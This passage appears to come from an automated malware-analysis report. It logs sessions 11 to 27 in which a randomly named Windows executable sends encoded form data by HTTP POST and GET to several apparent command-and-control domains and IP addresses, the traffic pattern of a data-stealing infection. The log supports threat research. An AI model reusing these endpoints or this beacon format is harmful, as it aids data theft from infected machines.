                                                                                                                      Data Ascii: sn0PLN=6njfiHd/8RikZKE9dLKURUaONHLvjXVWs1Yh9TVgave5pGjvMsmg+uOOj0VtXN/vUeCiDUO99mTG03jBmqXARtSV/DhzPD1Yw2V05w55S/gIM5C9Kb2QKDAfaFGeK4NVld442zMHegoEJruFgXFFhW4VDJR5+1gfzo1YVidlKMOyxWCxyzxl7Mxp49V+/WQ8G5AbU1PHB6xo8CsGqS8ZeOk=


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      11 | 192.168.2.4 | 62909 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      Nov 1, 2024 09:18:50.420914888 CET | 10877 | OUT | POST /mgme/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.suree.bet
                                                                                                                      Origin: http://www.suree.bet
                                                                                                                      Referer: http://www.suree.bet/mgme/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 62910 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:18:52.964891911 CET | 526 | OUT | GET /mgme/?sn0PLN=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.suree.bet
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:18:54.499588013 CET | 403 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Fri, 01 Nov 2024 08:18:54 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 263
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sn0PLN=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&xZa=jpgDOVH8PXW8oBA0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 62911 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:18:59.577398062 CET | 805 | OUT | POST /4q66/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.bocadolobopetra.net
                                                                                                                      Origin: http://www.bocadolobopetra.net
                                                                                                                      Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=osnv7c/A27cFU5gRMAlaowO4gc3icuQRmRcoVNIkc67MaBc2XWSWaDPjX/ydvlrJLugSg1SIJSY3fX0Y0s2y39zvvL243S1mZbTCd8ZjCbiE2RgK95K3wWT9e4//KvEKE6BA7FyYWq402NqtZO+8EMF0AiW+mrzTj1grwZyuU9Ts1N24qdWS/S87U+tnsJuCUQ==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 62912 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:02.134051085 CET | 825 | OUT | POST /4q66/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.bocadolobopetra.net
                                                                                                                      Origin: http://www.bocadolobopetra.net
                                                                                                                      Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=osnv7c/A27cFSaIROhlajwO58M3iGeQVmRQoVI4OcIvMbk42FjuWdDPjcfyiy1qFLulng0eIJSc3fSQY1fux2tzt6b2+zS1mZbTCd8MECb6E3lkK+biwxWT6UY//cfE0E6Bm7HH1Wsk02IWtYcXOPMFyEiXo1r+2rF5d9oi3Z+Tx9r7i7s3FtSYIJ5kThKTLPTj9aVPlQClZeDGypmu4Yg8=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 62913 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:04.688930988 CET | 10907 | OUT | POST /4q66/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.bocadolobopetra.net
                                                                                                                      Origin: http://www.bocadolobopetra.net
                                                                                                                      Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 62914 | 3.33.130.190 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:07.227822065 CET | 536 | OUT | GET /4q66/?sn0PLN=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.bocadolobopetra.net
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:19:10.800127029 CET | 403 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: openresty
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:10 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 263
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?sn0PLN=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&xZa=jpgDOVH8PXW8oBA0"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 62915 | 38.47.232.160 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:16.003429890 CET | 775 | OUT | POST /wh1i/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.44kdd.top
                                                                                                                      Origin: http://www.44kdd.top
                                                                                                                      Referer: http://www.44kdd.top/wh1i/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=Admh/P5tA4M5Ww/TEcdjoh7JTK7mZIT8OGgAcaya3rc1xnFpsoC6jUB7uMOx8hXhlVF9ntJ7fxkX4XjQlgobwmxCLvhxPHdxlXtv6f9HbedAKfaDCbPdkh8TrqLEc1ZBR3PftjlRVTXBb4LbTFGxcY8ytcNzqPRhWAj9ruAOCFDxTCvgXCvEYp+gRsC2Gn4ANw==
Nov 1, 2024 09:19:16.992831945 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:16 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66df9c88-94"
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 62916 | 38.47.232.160 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:18.616914034 CET | 795 | OUT | POST /wh1i/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.44kdd.top
                                                                                                                      Origin: http://www.44kdd.top
                                                                                                                      Referer: http://www.44kdd.top/wh1i/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=Admh/P5tA4M5XUDTG9dj9x7GWK7mM4T4OGsAcb2K3dM1/n1ptpC6u0B7msP74hXQlV5DnoJ7fwEX4SfQ5CAcw2xAefh3BndxlXtv6fppbeFAKsCDD6Pe7R8UsqLEKFZNR3O6tmF/VWTBb93bTRauVY8owMMQjcImZDGwvoQoFmfsSEi6GzOTKpaTMrLCLkFJW8XchIBXgTGcXArdzxvwqpc=
Nov 1, 2024 09:19:19.591402054 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:19 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66df9c88-94"
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 62917 | 38.47.232.160 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:21.343086004 CET | 10877 | OUT | POST /wh1i/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.44kdd.top
                                                                                                                      Origin: http://www.44kdd.top
                                                                                                                      Referer: http://www.44kdd.top/wh1i/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:19:22.270983934 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:22 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66df9c88-94"
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 62918 | Destination IP: 38.47.232.160 | Destination Port: 80 | PID: 3608 | Process: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:23.900376081 CET | 526 | OUT | GET /wh1i/?sn0PLN=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.44kdd.top
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:19:24.847829103 CET | 312 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:24 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 148
                                                                                                                      Connection: close
                                                                                                                      ETag: "66df9c88-94"
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 62919 | Destination IP: 34.92.109.131 | Destination Port: 80 | PID: 3608 | Process: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:31.561894894 CET | 778 | OUT | POST /qgza/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.dbasky.net
                                                                                                                      Origin: http://www.dbasky.net
                                                                                                                      Referer: http://www.dbasky.net/qgza/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=nW36fIgzsujGm1PSf+XAlzOn03j2XmhKebasPOj3jd1EEc8s9E5XPwi6AH7NQPCfRrZK58ElpDLshG3G45kjs0zMiGkeH5aJ6kGQIhBf6FlI0N6PvtucAlbU3QRBVSAx1kJ2OFiviUHsM8/u7kv2uNIEqSV28zdiaa+x96QzVRHCkBqlVLt+DNa142T/mbn1lg==
Nov 1, 2024 09:19:32.502451897 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:32 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 146
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 62920 | Destination IP: 34.92.109.131 | Destination Port: 80 | PID: 3608 | Process: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:34.106338024 CET | 798 | OUT | POST /qgza/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.dbasky.net
                                                                                                                      Origin: http://www.dbasky.net
                                                                                                                      Referer: http://www.dbasky.net/qgza/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=nW36fIgzsujGp1/SeZjApDOox3j2A2hOebmsPLDnjvhEE9Ms8GBXIwi6YX7IUPCERsR458IlpDPshGHG7KdRtkzKtmkcYJaJ6kGQIghx6FtI39qP9fKfJFbTwQRBRSA11kIjOAeBiSLsM5Du7Vv3lNIduSVl92tmXvTDjJhWUVzVonn/E6MpRN+GlxaLrYa8+tC+QduYvZONvq0yPSrAMow=
Nov 1, 2024 09:19:35.070667028 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:34 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 146
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 62921 | Destination IP: 34.92.109.131 | Destination Port: 80 | PID: 3608 | Process: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:36.650254011 CET | 10880 | OUT | POST /qgza/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.dbasky.net
                                                                                                                      Origin: http://www.dbasky.net
                                                                                                                      Referer: http://www.dbasky.net/qgza/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:19:37.584239960 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:37 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 146
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 62922 | Destination IP: 34.92.109.131 | Destination Port: 80 | PID: 3608 | Process: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:39.213932991 CET | 527 | OUT | GET /qgza/?sn0PLN=qUfac4sEgcT1lV7He6HHqRuPwSXpeUZhJqCALOrqisMgJsMY6XUJFSDaK0uTR8zfEfRb7N0j/DnowCq79bdHl1fL6DN9OJHq4gCFNVkq5WVy1qGx7uu1RVo=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.dbasky.net
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 1, 2024 09:19:40.158385038 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:40 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 146
                                                                                                                      Connection: close
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 62923 | Destination IP: 162.0.211.143 | Destination Port: 80 | PID: 3608 | Process: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:45.385766029 CET | 781 | OUT | POST /icpx/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.zoptra.info
                                                                                                                      Origin: http://www.zoptra.info
                                                                                                                      Referer: http://www.zoptra.info/icpx/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=JUs/7o27n1e9T4wjRtsVpj+I6Iv31XXb9lxRUGPM/Z718bS36bYLvLH8e6xO3jasBhZLCIjvDwki6VVdRV5/Ywjg2AJcy+xQNmCp5yFeo83an0/5bFaji1Zxkw/8JQbohKSk3Zm1EEZOFFJ4tNVgOjMQrhvTBKM40MRtM29HM0TBnttx+AcIX+dQORQf2TNPQg==
Nov 1, 2024 09:19:46.091547012 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:45 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 62924 | 162.0.211.143 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
Nov 1, 2024 09:19:48.028384924 CET | 801 | OUT | POST /icpx/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.zoptra.info
                                                                                                                      Origin: http://www.zoptra.info
                                                                                                                      Referer: http://www.zoptra.info/icpx/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Ascii: sn0PLN=JUs/7o27n1e9JZAjXOEVlT+X2ov3gnXX9ltRUH7m4rf18/e37aYLoLH8RawEqTazBhdDCNbvD2Ii6XNdRjx+bAjm/gJe8exQNmCp5yQ5o4TanHn5bkagh1ZytQ/8fgbkhKTJ3Y6TEGROFAt4uZBnEjMS2xuvMPtHtvhkMA9GHHjSirgrvx9fF+5jTWZr7QwGLsScJfwpSCa97xtPXUJwdGw=
Nov 1, 2024 09:19:48.652123928 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Date: Fri, 01 Nov 2024 08:19:48 GMT
                                                                                                                      Server: Apache
                                                                                                                      Content-Length: 389
                                                                                                                      Connection: close
                                                                                                                      Content-Type: text/html
                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 62925 | 162.0.211.143 | 80 | 3608 | C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
Timestamp | Bytes transferred | Direction | Data
